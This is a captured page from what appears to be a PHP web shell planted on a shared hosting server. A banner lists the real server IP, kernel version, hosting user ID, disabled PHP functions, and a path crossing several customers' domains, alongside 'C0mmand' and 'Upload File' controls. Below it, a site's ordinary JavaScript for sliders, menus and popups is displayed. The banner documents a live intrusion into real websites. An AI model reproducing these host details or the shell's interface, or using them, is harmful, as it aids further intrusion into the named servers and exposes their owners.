Server IP : 153.92.220.142 / Your IP : 216.73.216.232 Web Server : LiteSpeed System : Linux nl-srv-web513.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64 User : u444427800 ( 444427800) PHP Version : 8.1.32 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u444427800/domains/dronacharyasunayana.com/../jmgcl.com/../amanclasses.in/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
$('.slick-slider').slick({ infinite: true, slidesToShow: 1, slidesToScroll: 1, arrows: false, autoplay: true, autoplaySpeed: 1000 }); $('.slider-pre').slick({ dots: false, infinite: false, arrows: false, infinite: true, autoplay: true, autoplaySpeed: 2000, slidesToShow: 2, slidesToScroll: 1, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 1, slidesToScroll: 1, infinite: true, dots: false, } }, { breakpoint: 767, settings: { slidesToShow: 1, slidesToScroll: 1, } }, ] }); // toggale barger = document.querySelector('.barger'); navigation = document.querySelector('.v-class-rsp'); headersection = document.querySelector('.header-section'); barger.addEventListener('click', () => { navigation.classList.toggle('v-class-rsp'); headersection.classList.toggle('h-nev-rsp') }); // For sticky Header $(window).scroll(function () { if ($(window).scrollTop() >= 100) { $('header-section').addClass('fixed-header'); } else { $('header-section').removeClass('fixed-header'); } }); // Popup Form $('.open-popup').click(function () { $('.model-popup').fadeIn(); }); $('.close').click(function () { $('.model-popup').fadeOut(); }); //marquee $(function () { $('marquee').mouseover(function () { $(this).attr('scrollamount', 0); }).mouseout(function () { $(this).attr('scrollamount', 5); }); }); //diseble website img code onclick // document.addEventListener("contextmenu", (event) => { // event.preventDefault(); // function disableRightClick() // { // alert("Sorry, right click is not allowed !!"); // return false; // } // }); // Fancybox.show(gallery, { // // Your options go here // }); // // HTML element // Fancybox.show([{ src: "#dialog-content", type: "inline" }]); // // A copy of HTML element // Fancybox.show([{ src: "#dialog-content", type: "clone" }]); // // Any HTML content // Fancybox.show([{ src: "<p>Lorem ipsum dolor sit amet.</p>", type: "html" }]);